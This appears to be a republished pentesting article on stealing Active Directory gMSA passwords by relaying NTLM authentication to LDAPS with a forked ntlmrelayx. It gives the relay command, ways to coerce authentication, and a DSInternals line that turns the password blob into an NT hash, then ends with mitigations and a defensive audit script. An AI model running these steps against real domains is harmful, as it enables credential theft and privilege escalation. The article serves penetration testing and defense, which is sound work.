2025-01-15 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article explains what gMSA is and why it matters. The editor found it very practical and shares it here as a reference.
Overview
gMSA stands for "Group Managed Service Accounts", the group managed service account type in Active Directory (AD). A gMSA stores its password in an LDAP attribute called msDS-ManagedPassword. The DC automatically rotates this value every 30 days, and the password can be retrieved by authorized administrators and by the servers on which the gMSA is installed. msDS-ManagedPassword is returned as a blob called MSDS-MANAGEDPASSWORD_BLOB, and it can be retrieved only over an encrypted connection (LDAPS, or an LDAP bind whose authentication type is "Sealing & Secure").
Before this, I personally didn't know much about gMSA, but after watching the "BloodHound 3.0" webinar hosted by Wald0 and CptJesus, I gained a new understanding of gMSA, in particular of why gMSA should be a focus of penetration testing.
Our analysis showed that, in general, besides the authorized administrators, additional user accounts are often granted permission to read a gMSA's password on the target device, while the gMSA account itself is usually granted administrator privileges, and sometimes even domain admin rights.
So how can this security problem be exploited, and how can the passwords of these privileged accounts be collected?
Since the community already has many techniques for generating incoming NTLM authentication connections, and the gMSA password is stored in an LDAP attribute, I think the best solution is to retrieve the password from the LDAP attribute msDS-ManagedPassword from within ntlmrelayx.
Relaying to LDAP
To relay NTLM authentication to LDAP, the relayed authentication must arrive over HTTP. SMB authentication cannot normally be relayed to LDAP because of the signing flags set during the NTLM negotiation, but CVE-2019-1040 bypasses the NTLM signing protection so that SMB -> LDAP relay becomes possible.
The NTLM relay process is as follows:
1. The target sends an NTLM_NEGOTIATE packet to the attacker
2. Next, the attacker relays the NTLM_NEGOTIATE packet to the selected target server
3. The target server sends a reply message to the attacker, which contains a NTLM_CHALLENGE packet
4. The attacker relays the NTLM_CHALLENGE packet to the target
5. The target sends a reply message to the attacker, which contains a NTLM_AUTHENTICATE packet
6. The attacker relays the NTLM_AUTHENTICATE packet to the target server
7. The attacker now holds an authenticated session with the target server
Unfortunately, I did not manage to implement "Sealing & Secure" authentication in ntlmrelayx, so we have to relay to LDAPS instead. LDAPS is simply LDAP over SSL/TLS; it is not configured by default in an Active Directory installation because no certificate is available by default.
Configure gMSA
# Create a KDS root key on the DC
Add-KdsRootKey -EffectiveTime (Get-Date).AddHours(-10)
# Create a new gMSA on the DC
New-ADServiceAccount -Name svc_msa -DNSHostName dc.htb.local -ManagedPasswordIntervalInDays 30 -PrincipalsAllowedToRetrieveManagedPassword msa_read,dc$
# Install the gMSA on the target server
Install-WindowsFeature AD-DOMAIN-SERVICES
Install-ADServiceAccount svc_msa
Exploit
First, we need incoming NTLM authentication to relay, which can be obtained in several ways, for example:
1. ADIDNS wildcard record
2. Responder
3. WPAD + mitm6
4. A vulnerable server that can be made to issue an HTTP authentication request
Next, use the following commands to clone my repository to your local host, install impacket, start ntlmrelayx, and then use whichever method you prefer to generate NTLM authentication traffic (this article does not go into how to generate that traffic):
git clone https://github.com/cube0x0/impacket
cd impacket
python setup.py install
python ./examples/ntlmrelayx.py --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs -debug -t ldaps://10.0.0.5
Then the blob is parsed with the DSInternals module. Since the password consists of random Unicode characters, we also convert the plaintext password to its NT hash:
# $blob holds the raw msDS-ManagedPassword bytes returned by ntlmrelayx
(ConvertFrom-ADManagedPasswordBlob -Blob $blob).SecureCurrentPassword | ConvertTo-NTHash
Mitigation scheme
NTLM relay to LDAP and LDAPS can be prevented by enforcing LDAP signing and LDAP channel binding on the domain controllers. In addition, do not grant the right to read a gMSA's password, or other special privileges, to more accounts than strictly necessary; every organization should follow least-privilege best practices.
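The two checks a defender would want from the overview and this mitigation section, as an added audit script that is not part of the original article: it lists every principal allowed to read each gMSA's password (flagging non-computer principals such as the msa_read user in the example above) and reads the LDAP signing and channel binding settings from each DC. It assumes the ActiveDirectory RSAT module, PowerShell remoting to the DCs, and an account permitted to read the NTDS registry key.

```powershell
# Added audit example (not from the original article). Requires the
# ActiveDirectory module and remoting to the DCs (assumptions).
Import-Module ActiveDirectory

# 1. Who may read each gMSA's msDS-ManagedPassword?
#    Every principal beyond the hosting computer accounts is one more
#    account whose relayed NTLM authentication yields the gMSA password.
$findings = foreach ($gmsa in Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword) {
    foreach ($dn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
        $p = Get-ADObject -Identity $dn -Properties objectClass, member
        [pscustomobject]@{
            gMSA        = $gmsa.SamAccountName
            Principal   = $p.Name
            Class       = $p.ObjectClass
            # A group grants the read right to all of its members
            MemberCount = if ($p.ObjectClass -eq 'group') { @($p.member).Count } else { 1 }
            Flag        = if ($p.ObjectClass -ne 'computer') { 'REVIEW: non-computer principal' } else { '' }
        }
    }
}
$findings | Sort-Object gMSA | Format-Table -AutoSize

# 2. Do the DCs enforce LDAP signing and channel binding?
#    LDAPServerIntegrity 2 = signing required; LdapEnforceChannelBinding 2 = always.
$dcs = (Get-ADDomainController -Filter *).HostName
Invoke-Command -ComputerName $dcs -ScriptBlock {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    $v = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    [pscustomobject]@{
        DC             = $env:COMPUTERNAME
        LDAPSigning    = if ($v.LDAPServerIntegrity -eq 2) { 'enforced' } else { 'NOT enforced: relay to LDAP possible' }
        ChannelBinding = if ($v.LdapEnforceChannelBinding -eq 2) { 'enforced' } else { 'NOT enforced: relay to LDAPS possible' }
    }
} | Format-Table -AutoSize
```

Any gMSA row flagged for review, or any DC reporting "NOT enforced", is a finding to fix before the relay described in this article becomes a concern.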